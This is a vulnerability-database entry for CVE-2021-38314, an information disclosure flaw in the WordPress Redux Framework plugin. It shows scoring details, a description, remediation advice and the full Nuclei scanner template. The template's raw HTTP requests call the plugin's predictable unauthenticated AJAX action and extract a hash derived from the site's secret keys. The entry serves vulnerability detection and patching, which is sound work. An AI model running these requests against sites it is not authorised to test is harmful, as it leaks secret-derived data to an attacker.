Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-38314
HistorySep 16, 2021 - 2:08 p.m.

WordPress Redux Framework <=4.2.11 - Information Disclosure

2021-09-1614:08:12
ProjectDiscovery
github.com
11

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5 Medium

AI Score

Confidence

High

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.001 Low

EPSS

Percentile

47.7%

WordPress Redux Framework plugin through 4.2.11 is susceptible to information disclosure. The plugin registers several unique AJAX actions available to unauthenticated users in the includes function in redux-core/class-redux-core.php. These are predictable, given that they are based on an md5 hash of the site URL with a known salt value of -redux and an md5 hash of the previous hash with a known salt value of -support. An attacker can potentially employ these AJAX actions to retrieve a list of active plugins and their versions, the site’s PHP version, and an unsalted md5 hash of the site’s AUTH_KEY concatenated with the SECURE_AUTH_KEY.

id: CVE-2021-38314

info:
  name: WordPress Redux Framework <=4.2.11 - Information Disclosure
  author: meme-lord
  severity: medium
  description: WordPress Redux Framework plugin through 4.2.11 is susceptible to information disclosure. The plugin registers several unique AJAX actions available to unauthenticated users in the includes function in redux-core/class-redux-core.php. These are predictable, given that they are based on an md5 hash of the site URL with a known salt value of -redux and an md5 hash of the previous hash with a known salt value of -support. An attacker can potentially employ these AJAX actions to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of the site's AUTH_KEY concatenated with the SECURE_AUTH_KEY.
  impact: |
    An attacker can exploit this vulnerability to gain sensitive information from the target system.
  remediation: |
    Update WordPress Redux Framework to version 4.2.12 or later.
  reference:
    - https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/
    - https://wahaz.medium.com/unauthenticated-sensitive-information-disclosure-at-redacted-2702224098c
    - https://blog.sorcery.ie/posts/redux_wordpress/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-38314
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-38314
    cwe-id: CWE-916,CWE-200
    epss-score: 0.00153
    epss-percentile: 0.51586
    cpe: cpe:2.3:a:redux:gutenberg_template_library_\&_redux_framework:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: redux
    product: gutenberg_template_library_\&_redux_framework
    framework: wordpress
  tags: cve2021,cve,wordpress,wp-plugin,redux

http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
      - |
        GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "len(body)<50"

      - type: regex
        name: meme
        part: body
        regex:
          - '[a-f0-9]{32}'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        regex:
          - '[a-f0-9]{32}'
        part: body
# digest: 4a0a004730450221009c6646056c014dae8d1474e33793e69608ec63375825749a5e8a0272759ede27022074b0a45798025f41c94b87acd1281a1359b3b367b40cbb0dc29e5b447b387ccf:922c64590222798bb761d5b6d8e72950

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5 Medium

AI Score

Confidence

High

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.001 Low

EPSS

Percentile

47.7%